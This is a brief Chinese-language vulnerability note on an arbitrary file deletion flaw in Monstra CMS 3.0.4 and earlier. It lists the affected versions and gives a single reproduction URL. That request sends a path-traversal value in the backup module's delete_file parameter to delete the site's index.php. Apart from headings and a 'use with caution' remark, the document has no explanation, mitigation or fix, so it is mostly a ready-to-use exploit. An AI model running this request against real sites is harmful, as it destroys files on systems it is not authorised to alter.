Monstra CMS \<= 3.0.4 任意文件删除漏洞

一、漏洞简介

慎用

二、漏洞影响

Monstra CMS \<= 3.0.4

三、复现过程

http://www.0-sec.org/admin/index.php?id=backup&delete_file=/.......//./.......//./index.php&token=f62369587a94433bb2c3c00264e8705171c6189f